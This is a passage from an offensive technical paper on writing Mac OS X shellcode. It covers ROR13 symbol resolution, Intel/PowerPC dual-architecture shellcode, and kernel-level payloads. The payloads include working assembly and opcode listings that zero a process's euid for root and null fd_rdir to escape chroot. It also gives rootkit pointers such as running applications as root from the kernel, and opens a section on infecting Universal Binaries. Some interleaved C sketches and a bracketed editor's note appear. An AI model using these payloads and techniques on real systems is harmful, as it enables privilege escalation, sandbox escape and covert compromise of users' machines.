and pasted some of skape's code into a little C program as follows:

#include <stdio.h>
#include <stdlib.h>

char chsc[] =
"\x89\xe5\x51\x60\x8b\x75\x04\x31"
"\xff\x31\xc0\xfc\xac\x84\xc0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4"
"\x89\x7d\xfc\x61\x58\x89\xec\xc3";

int main(int ac, char **av)
{
        long (*hashstr)() = (long (*)())chsc;

        if(ac != 2) {
                fprintf(stderr,"[!] usage: %s <string to hash>\n",*av);
                exit(1);
        }

        printf("[+] Hash: 0x%x\n",hashstr(av[1]));

        return 0;
}

We can run this as shown below to generate our hash:

-[nemo@fry:~/code/kernelsc]$ ./comphash _do_payload
[+] Hash: 0x8bd2d84d 
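The same hash can be computed without running machine code from a data
buffer. The sketch below follows the loop in the compute_hash assembly
(rotate right by 13, then add the byte); the function names ror32 and
ror13_hash are my own and do not come from skape's paper.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n) {
    return (v >> n) | (v << (32 - n));
}

/* For each byte of the string: rotate the accumulator right by 13,
 * then add the byte. The terminating NUL is not hashed. */
static uint32_t ror13_hash(const char *s) {
    uint32_t h = 0;
    while (*s) {
        h = ror32(h, 13);
        h += (uint8_t)*s++;
    }
    return h;
}
```

Calling ror13_hash("_do_payload") gives 0x8bd2d84d, the value printed
by comphash above.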


If the symbol we have resolved is a function that we wish to call 
there is a little more we must do before this is possible. 


Mac OS X’s linker, by default, uses lazy binding for external 
symbols. This means that if our intended function calls another 
function in an external library, which hasn’t been called elsewhere 
in the program already, the dynamic linker will try to resolve 

the address as you call it. 


For example, a call to execve() with lazy binding will be replaced
with a call to dyld_stub_execve() as shown below:

0x1f54 <do_payload+78>: call 0x301b <dyld_stub_execve>

At runtime this function contains one instruction:

call 0x8fe12f70 <__dyld_fast_stub_binding_helper_interface>

This invokes the dyld which resolves the symbol and replaces this
instruction with a jmp to the real code:

jmp 0x9003b7d0 <execve>

The only problem which this causes is that this function requires
the stack pointer to be correctly aligned, otherwise our code will
crash.

To do this we simply subtract 0xc from our stack pointer before
calling our function.


Note: 
This will not be necessary if the program you are 
exploiting has been compiled with the -bind_at_load 
flag. 


Here is the code I have used to make the call. 


done:
        mov eax, [esi + 0x8]    ;# eax == value
        xchg esp, edx           ;# annoyingly large
        sub dl, 0xc             ;# way to align the stack pointer
        xchg esp, edx           ;# without null bytes.
        call eax
        xchg esp, edx           ;# annoyingly large
        add dl, 0xc             ;# way to fix up the stack pointer
        xchg esp, edx           ;# without null bytes.
        ret


I have written a small sample C program to demonstrate this code
in action.


The following code has no call to do_payload(). The shellcode will 
resolve the address of this function and call it. 


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char symresolve[] =
"\x31\xdb\xf7\xe3\x31\xc9\x66\xb9\x1c\x10\x80\x39\x02\x74\x0a\x80"
"\x39\x01\x74\x0d\x03\x49\x04\xeb\xf1\x39\xd0\x89\xc8\x75\x16\xeb"
"\xf3\x8d\x71\x08\x81\x7e\x02\x4c\x49\x4e\x4b\x75\xe7\x39\xc2\x89"
"\xca\x75\x02\xeb\xdf\x8b\x78\x10\x2b\x78\x08\x8b\x72\x18\x01\xf7"
"\xeb\x39\x59\x8b\x09\x56\x57\x8b\x36\x01\xfe\x31\xff\x31\xc0\xfc"
"\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x39\xcf\x5f\x5e"
"\x74\x05\x8d\x76\x0c\xeb\xde\x8b\x46\x08\x87\xe2\x80\xea\x0c\x87"
"\xe2\xff\xd0\x87\xe2\x80\xc2\x0c\x87\xe2\xc3\xe8\xc2\xff\xff\xff"
"\x4d\xd8\xd2\x8b"; // HASH

void do_payload()
{
        char *args[] = {"/usr/bin/id",NULL};
        char *env[] = {"TERM=xterm",NULL};

        printf("[+] Executing id.\n");
        execve(*args,args,env);
}

int main(int ac, char **av)
{
        void (*fp)() = (void (*)())symresolve;

        fp();
        return 0;
}

As you can see below this code works as you’d expect. 


-[nemo@fry:~]$ ./testsymbols
[+] Executing id.
uid=501(nemo) gid=501(nemo) groups=501(nemo)


The full assembly listing for the method shown in this section 
is shown in the Appendix for this paper. 


I originally worked on this method for resolving kernel symbols.
Unfortunately, the kernel jettisons (free()’s) the LINKEDIT section
after it boots. Before doing this, it writes out the Mach-O file
/mach.sym containing the symbol information for the kernel.


If you set the boot flag "keepsyms" the LINKEDIT section will 
not be free()’ed and the symbols will remain in kernel memory. 


In this case we can use the code shown in this section, and
simply scan memory starting from the address 0x1000 until we
find 0xfeedface. Here is some assembly code to do this:


SECTION .text

_main:
        xor eax, eax
        inc eax
        shl eax, 0xc            ;# eax = 0x1000
        mov ebx, 0xfeedface     ;# ebx = 0xfeedface
up:
        inc eax
        inc eax
        inc eax
        inc eax                 ;# eax += 4
        cmp ebx, [eax]          ;# if (*eax != ebx) {
        jnz up                  ;#         goto up }
        ret
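
The same word-by-word search can be sketched in C against an ordinary
buffer, which makes it easy to experiment with outside the kernel. This
is only an illustration: find_macho_magic() and MH_MAGIC_VALUE are names
made up for this example, and unlike the assembly the loop is bounded by
the buffer length and checks the starting offset itself.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MH_MAGIC_VALUE 0xfeedfaceU      /* magic number from the text */

/*
 * Scan buf in 4-byte steps, starting at byte offset start, and return
 * the offset of the first word equal to MH_MAGIC_VALUE, or -1 if the
 * end of the buffer is reached first.
 */
long find_macho_magic(const uint8_t *buf, size_t len, size_t start)
{
        size_t off;
        uint32_t word;

        assert(buf != NULL);
        for (off = start; off + sizeof(word) <= len; off += 4) {
                /* Words are compared in host byte order. */
                memcpy(&word, buf + off, sizeof(word));
                if (word == MH_MAGIC_VALUE)
                        return (long)off;
        }
        return -1;
}
```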


After this is done we can resolve kernel symbols as needed.


--[ 4 - Architecture Spanning Shellcode


Since the move from PowerPC to Intel architecture it has become
common to find both PowerPC and Intel Macs running Mac OS X in
the wild. On top of this, Mac OS X 10.4 ships with virtualization
technology from Transitive called Rosetta which allows an Intel Mac
to execute a PowerPC binary. This means that even after you’ve
fingerprinted the architecture of a machine as Intel, there’s a
chance a network facing daemon might be running PowerPC code. This
poses a challenge when writing remote exploits, as incorrectly
fingerprinting the architecture of the machine will result in
failure.


In order to remedy this a technique can be used to create 
shellcode which executes on both Intel and PowerPC architecture. 


This technique has been documented in the Phrack article of the same 
name as this section [16]. 
I provide a brief explanation here as this technique is used 
throughout the remainder of the paper. 


The basic premise of this technique is to find a PowerPC instruction
which, when executed, will simply step forward one instruction. It
must do this without performing any memory access, only changing the
state of the registers. When this instruction is interpreted as Intel
opcodes however, a jump must be performed. This jump must be over the
PowerPC portion of the code and into the Intel instructions. In this
way the architecture type can be determined.


A suitable PowerPC instruction exists. This is the "rlwnm" 
instruction. 


The following is the definition of this instruction, taken from the 
PowerPC manual: 


(rlwnm) Rotate Left Word then AND with Mask (x’5c00 0000’)

rlwnm  rA,rS,rB,MB,ME (Rc = 0)
rlwnm. rA,rS,rB,MB,ME (Rc = 1)

+--------+-------+-------+-------+-------+-------+----+
| 010111 |   S   |   A   |   B   |  MB   |  ME   | Rc |
+--------+-------+-------+-------+-------+-------+----+
 0      5 6    10 11   15 16   20 21   25 26   30  31


This is the rotate left instruction on PowerPC. Basically, the
register rS is rotated left by the number of bits given in rB, and a
mask (defined by the bits MB to ME) is applied to the rotated value.
The result is stored in rA. No memory access is made by this
instruction regardless of the arguments given.


By using the following parameters for this instruction we can 
end up with a valid and useful opcode. 


rA = 16 
rS = 28 
rB = 29 
MB = XX 
ME = XX 


rlwnm r16,r28,r29,XX,XX

This leaves us with the opcode:

"\x5f\x90\xeb\xXX"


When this is broken down as Intel code it becomes the following
instructions:

nasm > db 0x5f,0x90,0xeb,0xXX

00000000 5F   pop edi        // pop the top of the stack into edi
00000001 90   nop            // do nothing.
00000002 EBXX jmp short 0xXX // jump to our payload.
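
To see how the register choices turn into those bytes, the instruction
word can be packed by hand. The sketch below follows the field layout
quoted from the PowerPC manual (primary opcode 23 in bits 0-5, then S, A,
B, MB, ME and Rc). encode_rlwnm() and to_bytes() are hypothetical helper
names. Note that the third byte only comes out as 0xeb when the top
three bits of MB are 011, so MB = 12 and ME = 3 are used here as one
combination that reproduces a final byte of 0x06.

```c
#include <assert.h>
#include <stdint.h>

/* Pack the rlwnm fields into a 32-bit PowerPC instruction word. */
uint32_t encode_rlwnm(unsigned rA, unsigned rS, unsigned rB,
                      unsigned MB, unsigned ME, unsigned Rc)
{
        assert(rA < 32 && rS < 32 && rB < 32);
        assert(MB < 32 && ME < 32 && Rc < 2);
        return (23u << 26) | (rS << 21) | (rA << 16) |
               (rB << 11) | (MB << 6) | (ME << 1) | Rc;
}

/* Store the word big-endian, the way it sits in PowerPC memory. */
void to_bytes(uint32_t insn, uint8_t out[4])
{
        out[0] = (uint8_t)(insn >> 24);
        out[1] = (uint8_t)(insn >> 16);
        out[2] = (uint8_t)(insn >> 8);
        out[3] = (uint8_t)insn;
}
```

With rA = 16, rS = 28, rB = 29, MB = 12, ME = 3 and Rc = 0 the word is
0x5f90eb06, i.e. the bytes 5f 90 eb 06.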


Here is a small example of how this can be useful. 


char trap[] =
"\x5f\x90\xeb\x06" // magic arch selector
"\x7f\xe0\x00\x08" // trap ppc instruction
"\xcc\xcc\xcc\xcc"; // intel: int3 int3 int3 int3


This shellcode, when executed on PowerPC architecture, will
execute the "trap" instruction directly below our selector code.
However, when this is interpreted as Intel architecture instructions
the "eb 06" causes a short jump into the int3 instructions. The
displacement of a jmp short is measured from the end of the two-byte
jmp instruction itself (offset 4 here) rather than from its start,
so 06 lands on trap+10, two bytes into the int3 block, while 04
would land exactly on the first int3 at trap+8. Either value works
here because every byte of the Intel payload is an int3.
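
A quick way to check where a short jump lands is to compute the target
from the offset of the jmp and its displacement byte. The helper below is
illustrative only (short_jmp_target() is a made-up name) and relies on
the x86 rule that the signed 8-bit displacement is added to the address
of the instruction following the two-byte jmp.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Offset reached by a two-byte "jmp short" (opcode 0xeb) located at
 * jmp_off whose displacement byte is disp.
 */
long short_jmp_target(long jmp_off, uint8_t disp)
{
        assert(jmp_off >= 0);
        /* The displacement is signed and relative to the next instruction. */
        return jmp_off + 2 + (int8_t)disp;
}
```

For the selector, short_jmp_target(2, 0x06) gives 10, which agrees with
gdb stopping at trap+11 right after the int3 at trap+10 has executed.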


To verify that this multi-arch technique works, here is the output
of gdb when attached to this process on Intel architecture:

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0000201b in trap ()
(gdb) x/i $pc
0x201b <trap+11>: int3

Here is the same output from a PowerPC version of this binary:

Program received signal SIGTRAP, Trace/breakpoint trap.
0x00002018 in trap ()
(gdb) x/i $pc
0x2018 <trap+4>: trap


--[ 5 - Writing Kernel level shellcode


In this section we will look at some techniques for writing shellcode 
for use when exploiting kernel level vulnerabilities. 


A couple of things to note before we begin. Mac OS X does not share an
address space for kernel/user space. Both the kernel and userspace
have a 4GB address space each (0x0 -> 0xffffffff).


I did not bother with writing PowerPC code again for most of what I’ve
done. If you really want PowerPC code, some concepts here will quickly
port, others require a little thought ;).


--[ 5.1 - Local privilege escalation 


The first type of kernel shellcode we will look at writing is for 
local vulnerabilities. The typical objective for local kernel 
shellcode is simply to escalate the privileges of our userspace 
process. 


This topic was covered in noir’s excellent paper on OpenBSD kernel 
exploitation in Phrack 60. [6] 


A lot of the techniques from noir’s paper apply directly to Mac OS X. 
noir shows that the sysctl() function can be used to retrieve the 
kinfo_proc struct for a particular process id. As you can see below 
one of the members of the kinfo_proc struct is a pointer to the proc 
struct. 


struct kinfo_proc {
        struct extern_proc kp_proc;             /* proc structure */
        struct eproc {
                struct proc *e_paddr;           /* address of proc */
                struct session *e_sess;         /* session pointer */
                struct _pcred e_pcred;          /* process credentials */
                struct _ucred e_ucred;          /* current credentials */
                struct vmspace e_vm;            /* address space */
                pid_t e_ppid;                   /* parent process id */
                pid_t e_pgid;                   /* process group id */
                short e_jobc;                   /* job control counter */
                dev_t e_tdev;                   /* controlling tty dev */
                pid_t e_tpgid;                  /* tty process group id */
                struct session *e_tsess;        /* tty session pointer */
#define WMESGLEN 7
                char e_wmesg[WMESGLEN+1];       /* wchan message */
                segsz_t e_xsize;                /* text size */
                short e_xrssize;                /* text rss */
                short e_xccount;                /* text references */
                short e_xswrss;
                int32_t e_flag;
#define EPROC_CTTY 0x01         /* controlling tty vnode active */
#define EPROC_SLEADER 0x02      /* session leader */
#define COMAPT_MAXLOGNAME 12
                char e_login[COMAPT_MAXLOGNAME]; /* short setlogin() name */
                int32_t e_spare[4];
        } kp_eproc;
};

Ilja van Sprundel mentioned this technique in his talk at Blackhat [7].
Basically, we can use the leaked address "p.kp_eproc.e_paddr" to access
the proc struct for our process in memory.

The following function will return the address of a pid’s proc struct
in the kernel.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/sysctl.h>

long get_addr(pid_t pid) {
        int i, mib[4];
        size_t sz = sizeof(struct kinfo_proc);
        struct kinfo_proc p;

        mib[0] = CTL_KERN;
        mib[1] = KERN_PROC;
        mib[2] = KERN_PROC_PID;
        mib[3] = pid;

        i = sysctl(mib, 4, &p, &sz, NULL, 0);
        if (i == -1) {
                perror("sysctl()");
                exit(1);
        }
        return (long)p.kp_eproc.e_paddr;
}

Now that we have the address of our proc struct, we simply have to
change our uid and/or euid in their respective structures.

Here is a snippet from the proc struct:

struct proc {
        LIST_ENTRY(proc) p_list;        /* List of all processes. */

        /* substructures: */
        struct ucred *p_ucred;          /* Process owner’s identity. */
        struct filedesc *p_fd;          /* Ptr to open files structure. */
        struct pstats *p_stats;         /* Accounting/statistics (PROC ONLY). */
        struct plimit *p_limit;         /* Process limits. */
        struct sigacts *p_sigacts;      /* Signal actions, state (PROC ONLY). */

As you can see, following the p_list there is a pointer to the 
ucred struct. This struct is shown below. 


struct _ucred {
        int32_t cr_ref;                 /* reference count */
        uid_t cr_uid;                   /* effective user id */
        short cr_ngroups;               /* number of groups */
        gid_t cr_groups[NGROUPS];       /* groups */
};


By changing the cr_uid field in this struct, we set the euid of
our process.

The following assembly code will seek to this struct and null
out the ucred cr_uid field. This leaves us with root
privileges on an Intel platform.

SECTION .text

_main:
        mov ebx, 0xdeadbeef     ;# ebx = proc address
        mov ecx, [ebx + 8]      ;# ecx = ucred
        xor eax, eax
        mov [ecx + 12], eax     ;# zero out the euid
        ret

To use this code we need to replace the address 0xdeadbeef with
the address of the proc struct which we looked up earlier.
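
The pointer walk is easier to follow when replayed against a mock
memory image. The sketch below is purely a simulation under stated
assumptions: fake_mem stands in for 32-bit kernel memory, the offsets 8
and 12 are simply the ones used by the assembly, and load32(), store32()
and zero_euid() are names invented for this example.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define P_UCRED_OFF 8   /* offset of p_ucred used by the assembly */
#define CR_UID_OFF  12  /* offset of cr_uid used by the assembly */

static uint8_t fake_mem[256];   /* stand-in for 32-bit kernel memory */

uint32_t load32(uint32_t addr)
{
        uint32_t v;

        assert(addr + sizeof(v) <= sizeof(fake_mem));
        memcpy(&v, fake_mem + addr, sizeof(v));
        return v;
}

void store32(uint32_t addr, uint32_t v)
{
        assert(addr + sizeof(v) <= sizeof(fake_mem));
        memcpy(fake_mem + addr, &v, sizeof(v));
}

/* Same walk as the shellcode: proc -> ucred, then cr_uid = 0. */
void zero_euid(uint32_t proc_addr)
{
        uint32_t ucred = load32(proc_addr + P_UCRED_OFF);

        store32(ucred + CR_UID_OFF, 0);
}
```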


Here is some code from Ilja van Sprundel’s talk which does the 
same thing on a PowerPC platform. 


int kshellcode[] = {
        0x3ca0aabb, // lis r5, 0xaabb
        0x60a5ccdd, // ori r5, r5, 0xccdd
        0x80c5ffa8, // lwz r6, -88(r5)
        0x80e60048, // lwz r7, 72(r6)
        0x39000000, // li r8, 0
        0x9106004c, // stw r8, 76(r6)
        0x91060050, // stw r8, 80(r6)
        0x91060054, // stw r8, 84(r6)
        0x91060058, // stw r8, 88(r6)
        0x91070004  // stw r8, 4(r7)
};


We can combine the two shellcodes into one architecture 
spanning shellcode. This is a simple process and is 
documented in section 4 of this paper. 


The full listing for our multi-arch code is shown 
in the Appendix. 


On PowerPC processors XNU uses an optimization referred to 
as the "user memory window". This means that the user address 
space and the kernel address space share some mappings. 


This design is in place for copyin/copyout etc. to use.
The user memory window typically starts at 0xe0000000 in both 
the kernel and user address space. This can be useful when 
trying to position shellcode for use in local privilege 
escalation vulnerabilities. 


--[ 5.2 - Breaking chroot()


Before we look into how we can go about breaking out of
processes after they have used the chroot() syscall, we
will take a look at why, a lot of the time, we don’t need to.


-[root@fry:/chroot]# touch file_outside_chroot
-[root@fry:/chroot]# ls -lsa file_outside_chroot
0 -rw-r--r-- 1 root admin 0 Jan 29 12:17 file_outside_chroot

-[root@fry:/chroot]# chroot demo /bin/sh
-[root@fry:/]# ls -lsa file_outside_chroot
ls: file_outside_chroot: No such file or directory
-[root@fry:/]# pwd
/
-[root@fry:/]# ls -lsa ../file_outside_chroot
0 -rw-r--r-- 1 root admin 0 Jan 29 20:17 ../file_outside_chroot
-[root@fry:/]# ../../usr/sbin/chroot ../../ /bin/sh
-[root@fry:/]# ls -lsa /chroot/file_outside_chroot
0 -rw-r--r-- 1 root admin 0 Jan 29 12:17 /chroot/file_outside_chroot


As you can see, the /usr/sbin/chroot command which ships 
with Mac OS X does not chdir() and therefore does not 
really do very much at all. 


The author suggests the following addition be made to the
chroot man page on Mac OS X:

"Caution: Does not work."


On an unrelated note, this patch would also be suitable for 
the setreuid() man page. 


I won’t spend too much time on this since noir already 
covered it really well in his paper. [6] 


Basically as noir mentions, all we need to do to break our 
process out of the chroot() is to set the p->p_fd->fd_rdir 
element in our proc struct to NULL. 


We can get the address of our proc struct using sysctl as 
mentioned earlier. 


noir already provides us with the instructions for this: 


mov edx, [ecx + 0x14]   ;# edx = p->p_fd
mov [edx + 0xc], eax    ;# p->p_fd->fd_rdir = 0


--[ 5.3 - Advancements


Now that we are familiar with writing shellcode for use
in local exploits, where we already have local access to
the box, the rest of the kernel related code in this paper
will focus on accomplishing its task without any userspace
access required.


In order to do this, we can utilize the per-cpu, task, proc
and thread structures in the kernel. The definitions for
each of these structures can be found in the osfmk/kern/
and bsd/sys/ directories in various header files.


The first struct which we will look at is the "cpu_data" 
struct found in osfmk/i386/cpu_data.h. 


I have included the definition for this struct below: 


/*
 * Per-cpu data.
 *
 * Each processor has a per-cpu data area which is dereferenced through the
 * current_cpu_datap() macro. For speed, the %gs segment is based here, and
 * using this, in-lines provides single-instruction access to frequently
 * used members - such as get_cpu_number()/cpu_number(), and
 * get_active_thread()/ current_thread().
 *
 * Cpu data owned by another processor can be accessed using the
 * cpu_datap(cpu_number) macro which uses the cpu_data_ptr[] array of
 * per-cpu pointers.
 */
typedef struct cpu_data
{
        struct cpu_data *cpu_this;              /* pointer to myself */
        thread_t cpu_active_thread;
        void *cpu_int_state;                    /* interrupt state */
        vm_offset_t cpu_active_stack;           /* kernel stack base */
        vm_offset_t cpu_kernel_stack;           /* kernel stack top */
        vm_offset_t cpu_int_stack_top;
        int cpu_preemption_level;
        int cpu_simple_lock_count;
        int cpu_interrupt_level;
        int cpu_number;                         /* Logical CPU */
        int cpu_phys_number;                    /* Physical CPU */
        cpu_id_t cpu_id;                        /* Platform Expert */
        int cpu_signals;                        /* IPI events */
        int cpu_mcount_off;                     /* mcount recursion */
        ast_t cpu_pending_ast;
        int cpu_type;
        int cpu_subtype;
        int cpu_threadtype;
        int cpu_running;
        uint64_t rtclock_intr_deadline;
        rtclock_timer_t rtclock_timer;
        boolean_t cpu_is64bit;
        task_map_t cpu_task_map;
        addr64_t cpu_task_cr3;
        addr64_t cpu_active_cr3;
        addr64_t cpu_kernel_cr3;
        cpu_uber_t cpu_uber;
        void *cpu_chud;
        void *cpu_console_buf;
        struct cpu_core *cpu_core;              /* cpu’s parent core */
        struct processor *cpu_processor;
        struct cpu_pmap *cpu_pmap;
        struct cpu_desc_table *cpu_desc_tablep;
        struct fake_descriptor *cpu_ldtp;
        cpu_desc_index_t cpu_desc_index;
        int cpu_ldt;
#ifdef MACH_KDB
        /* XXX Untested: */
        int cpu_db_pass_thru;
        vm_offset_t cpu_db_stacks;
        void *cpu_kdb_saved_state;
        spl_t cpu_kdb_saved_ipl;
        int cpu_kdb_is_slave;
        int cpu_kdb_active;
#endif /* MACH_KDB */
        boolean_t cpu_iflag;
        boolean_t cpu_boot_complete;
        int cpu_hibernate;
        pmsd pms;               /* Power Management Stepper control */
        uint64_t rtcPop;        /* when the etimer wants a timer pop */
        vm_offset_t cpu_copywindow_base;
        uint64_t *cpu_copywindow_pdp;
        vm_offset_t cpu_physwindow_base;
        uint64_t *cpu_physwindow_ptep;
        void *cpu_hi_iss;
        boolean_t cpu_tlb_invalid;
        uint64_t *cpu_pmHpet;
                        /* Address of the HPET for this processor */
        uint32_t cpu_pmHpetVec;
                        /* Interrupt vector for HPET for this processor */
        /* Statistics */
        pmStats_t cpu_pmStats;
                        /* Power management data */
        uint32_t cpu_hwintCnt[256];             /* Interrupt counts */
        uint64_t cpu_dr7;                       /* debug control register */
} cpu_data_t;


As you can see, this structure contains valuable information 
for our shellcode running in the kernel. We just need to 
figure out how to access it. 


The following macro shows how we can access this structure. 


/* Macro to generate inline bodies to retrieve per-cpu data fields. */
#define offsetof(TYPE,MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
#define CPU_DATA_GET(member,type)                               \
        type ret;                                               \
        __asm__ volatile ("movl %%gs:%P1,%0"                    \
                : "=r" (ret)                                    \
                : "i" (offsetof(cpu_data_t,member)));           \
        return ret;


When our code is executing in kernel space the gs selector can be used
to access our cpu_data struct. The first element of this struct
contains a pointer to the struct itself, so we no longer need to
use gs after this.


The first objective we will look at is the ability to find the
init process (pid=1) via this struct. Since our code may not
be running with an associated user space thread, we cannot count
on the uthread struct being populated in our thread_t struct.
An example of this might be when we exploit a network stack or
kernel extension.


The first step we must make to find the init process struct 
is to retrieve the pointer to our thread_t struct. 


We can do this by simply retrieving the pointer at gs:0x04. 
The following instructions will achieve this: 


_main: 
xor ebx, ebx ;# zero ebx 
mov eax, [gs:0x04 + ebx] ;# thread_t. 
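
The 0x04 used above is just the offset of cpu_active_thread inside
cpu_data. A small mock shows where that number comes from. This is a
sketch under assumptions: struct mock_cpu_data models only the first
three members, with pointers and thread_t represented as uint32_t so
that the offsets match an i386 kernel regardless of the machine it is
compiled on, and read_member() is a hypothetical stand-in for the
gs-relative load.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical 32-bit mock of the start of cpu_data. */
struct mock_cpu_data {
        uint32_t cpu_this;              /* pointer to myself */
        uint32_t cpu_active_thread;     /* thread_t */
        uint32_t cpu_int_state;         /* interrupt state */
};

/* Read a 32-bit member located off bytes from base. */
uint32_t read_member(const void *base, size_t off)
{
        uint32_t v;

        assert(base != NULL);
        memcpy(&v, (const uint8_t *)base + off, sizeof(v));
        return v;
}
```

Here offsetof(struct mock_cpu_data, cpu_active_thread) evaluates to 4,
matching the gs:0x04 access.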


After these instructions are executed, we have a pointer to
our thread struct in eax. The thread struct is defined in
osfmk/kern/thread.h. A portion of this struct is shown below:


struct thread {
        queue_chain_t links;            /* run/wait queue links */
        run_queue_t runq;               /* run queue thread is on SEE BELOW */
        wait_queue_t wait_queue;        /* wait queue we are currently on */
        event64_t wait_event;           /* wait queue event */
        integer_t options;              /* options set by thread itself */
        ...
        /* Data used during setrun/dispatch */
        timer_data_t system_timer;      /* system mode timer */
        processor_set_t processor_set;  /* assigned processor set */
        processor_t bound_processor;    /* bound to a processor? */
        processor_t last_processor;     /* processor last dispatched on */
        uint64_t last_switch;           /* time of last context switch */
        ...
        void *uthread;
#endif
};


This struct, again, contains many fields which are useful
for our shellcode. However, in this case we are trying to
find the proc struct. Because we might not necessarily
already have a uthread associated with us, as mentioned
earlier, we must look elsewhere for a list of tasks to
locate init (launchd).


The next step in this process is to retrieve the
"last_processor" element from our thread_t struct.
We do this using the following instructions:

        mov bl, 0xf4
        mov ecx, [eax + ebx]    ;# last_processor

The last_processor pointer points to a processor
struct as the name suggests ;) We can walk from the
last_processor struct back to the default pset in
order to find the pset which contains init.

        mov eax, [ecx]          ;# default_pset + 0xc

We then retrieve the task head from this struct.

        push word 0x458
        pop bx
        mov eax, [eax + ebx]    ;# tasks head.

And retrieve the bsd_info element of the task.
This is a proc struct pointer.

        push word 0x19c
        pop bx
        mov eax, [eax + ebx]    ;# get bsd_info

The proc struct is defined in xnu/bsd/sys/proc_internal.h.
The first element of the proc struct is:

        LIST_ENTRY(proc) p_list;        /* List of all processes. */

We can walk this list to find a particular process that we want.
For most of our code we will start with a pointer to the init
process (launchd on Mac OS X). This process has a pid of 1.

To find this we simply walk the list checking the pid field
at offset 36. The code to do this is as follows:

next_proc:
        mov eax, [eax + 4]      ;# prev
        mov ebx, [eax + 36]     ;# pid
        dec ebx
        test ebx, ebx           ;# if pid was 1
        jnz next_proc
done:
        ;# eax = struct proc *init;

Now that we have developed code which will retrieve a pointer
to the proc struct for the init process, we can look at some
of the things that we can accomplish using this pointer.
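
For comparison, here is the same kind of list walk expressed in C
against a mock structure. It is only a sketch: struct mock_proc is a
heavily reduced, hypothetical stand-in for struct proc, find_proc() is
an invented name, and unlike the shellcode it checks the starting entry
first and gives up after max_steps so that a missing pid cannot spin
forever.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, reduced stand-in for struct proc. */
struct mock_proc {
        struct mock_proc *next; /* plays the role of the p_list link */
        int pid;
};

/* Follow the list links from start until the wanted pid is found. */
struct mock_proc *find_proc(struct mock_proc *start, int pid, int max_steps)
{
        struct mock_proc *p = start;

        assert(max_steps >= 0);
        while (p != NULL && max_steps-- > 0) {
                if (p->pid == pid)
                        return p;
                p = p->next;
        }
        return NULL;
}
```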


The first thing which we will look at is simply rewriting the
privilege escalation code listed earlier. Our new version of
this code will not require any help from userspace
(sysctl etc).

I think the below code is fairly self explanatory.

%define PID 1337

find_pid:
        mov eax, [eax + 4]      ;# eax = next proc
        mov ebx, [eax + 36]     ;# pid
        cmp bx, PID
        jnz find_pid
        mov ecx, [eax + 8]      ;# ecx = ucred
        xor eax, eax
        mov [ecx + 12], eax     ;# zero out the euid


As you can see the cpu_data struct opens up many possibilities
for our shellcode. Hopefully I will have time to go into some
of these in a future paper.


--[ 6 - Misc Rootkit Techniques


In this section I will run over a few short pieces of
information which might be relevant to someone who is
developing a rootkit for Mac OS X. I didn’t really have
another place to put this stuff, so this will have to do.

The first thing to note is that an API exists [21] for
executing userspace applications from kernelspace. This
is called the Kernel User Notification Daemon. This is
implemented using a mach port which the kernel uses to
communicate with a userspace daemon named kuncd.


The file xnu/osfmk/UserNotification/UNDRequest.defs 
contains the Mach Interface Generator (MIG) interface 
definitions for the communication with this daemon. 


The mach port is called: 
"com.apple.system.Kernel[UNC]Notifications" and is 
registered by the daemon /usr/libexec/kuncd. 


Here is an example of how to use this interface 
programmatically. The interface allows you to display 
messages via the GUI to the user, and also run any 
application. 


kern_return_t ret;

ret = KUNCExecute(
        "/Applications/TextEdit.app/Contents/MacOS/TextEdit",
        kOpenAppAsRoot,
        kOpenApplicationPath
);

ret = KUNCExecute(
        "Internet.prefPane",
        kOpenAppAsConsoleUser,
        kOpenPreferencePanel
);


There may be a situation where you wish code to be executed on all the
processors on a system. This may be something like updating the IDT / MSR
and not wanting a processor to miss out on it.


The xnu kernel provides a function for this. The comment and prototype 
explain this a lot better than I can. So here you go: 


/*
 * All-CPU rendezvous:
 *      - CPUs are signalled,
 *      - all execute the setup function (if specified),
 *      - rendezvous (i.e. all cpus reach a barrier),
 *      - all execute the action function (if specified),
 *      - rendezvous again,
 *      - execute the teardown function (if specified), and then
 *      - resume.
 *
 * Note that the supplied external functions _must_ be reentrant and aware
 * that they are running in parallel and in an unknown lock context.
 */

void
mp_rendezvous(void (*setup_func)(void *),
              void (*action_func)(void *),
              void (*teardown_func)(void *),
              void *arg)
{


The code for the functions related to this are stored in 
xnu/osfmk/i386/mp.c. 


--[ 7 - Universal Binary Infection


[SINCE YOU CHAT A BIT ABOUT MACH-O HERE, MAYBE MOVE THIS SECTION
TO SOMEWHERE EARLIER IN THE PAPER? YOU CAN EXPAND A LITTLE AND
IT MIGHT MAKE THE LINKEDIT / LC_SYMTAB ETC SECTION MORE CLEAR AS
YOU ALSO GO INTO THE MAGIC NUMBER MUMBO-JUMBO HERE AS WELL]

The Mach-O object format is used on operating systems which have
a kernel based on Mach. This is the format which is used by
Mac OS X. Significant work has already been done regarding the
infection of this format. The papers [12] and [13] show some of
this. Mach-O files can be identified by the first four bytes of
the file which contain the magic number 0xfeedface.


Recently Mac OS X has moved from the PowerPC platform to Intel
architecture. This move has caused a new binary format to be
used for most of the applications on Mac OS X 10.4. The Universal
Binary format is defined in the Mach-O Runtime reference from
Apple [4].


The Universal Binary format is a fairly trivial archive format
which allows for multiple Mach-O files of varying architecture
types to be stored in a single file. The loader on Mac OS X is
able to interpret this file and distinguish which of the Mach-O
files inside the archive matches the architecture type of the
current system. (We’ll look at this a little more later.)


The structures used by Mac OS X to define and parse Universal 
binaries are contained in the file /usr/include/mach-o/fat.h. 


Universal binaries are recognizable, again, by the magic number 
in the first four bytes of the file. Universal binaries begin 
with the following header: 


struct fat_header {
        uint32_t magic;         /* FAT_MAGIC */
        uint32_t nfat_arch;     /* number of structs that follow */
};


The magic number on a universal binary is as follows:


#define FAT_MAGIC 0xcafebabe
#define FAT_CIGAM 0xbebafeca /* NXSwapLong(FAT_MAGIC) */


